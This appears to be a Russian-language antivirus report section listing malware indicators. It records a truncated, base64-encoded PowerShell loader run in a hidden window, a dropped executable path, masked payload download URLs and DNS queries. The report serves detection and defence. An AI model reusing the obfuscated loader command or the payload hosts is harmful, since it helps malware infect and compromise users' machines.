Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en JABGAGYAegByADQANwBmAD0AKAAnAEgAJwArACgAJwAzAGQAeQByACcAKwAnAGkAcgAnACkAKQA7AC4AKAAnAG4AZQB3ACcAKwAnAC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAEUAbgB2ADoAdQBzAEUAUgBwAFIAbwBGAGkAbABFAFwAUgA0AGUANABTA...
- %HOMEPATH%\r4e4spq\b6q4hq_\gq_enxi3g.exe
- %HOMEPATH%\r4e4spq\b6q4hq_\gq_enxi3g.exe
- http://yd##in.fun/wp-includes/J2gtP7rvBA/
- http://ga##x.eu/001_elemei/mg9/
- http://on###six.com/test/fPF2zBUI/
- http://vi#.##zhiguoren.com/mzxf3/7l6w6t/
- http://www.gr####studio.com/docs/5fTKVT/
- DNS ASK yd##in.fun
- DNS ASK ga##x.eu
- DNS ASK on###six.com
- DNS ASK vi#.##zhiguoren.com
- DNS ASK ye###itruong.vn
- DNS ASK gr####studio.com
- DNS ASK is####hnology.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en JABGAGYAegByADQANwBmAD0AKAAnAEgAJwArACgAJwAzAGQAeQByACcAKwAnAGkAcgAnACkAKQA7AC4AKAAnAG4AZQB3ACcAKwAnAC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAEUAbgB2ADoAdQBzAEUAUgBwAFIAbwBGAGkAbABFAFwAUgA0AGUANABTA...' (со скрытым окном)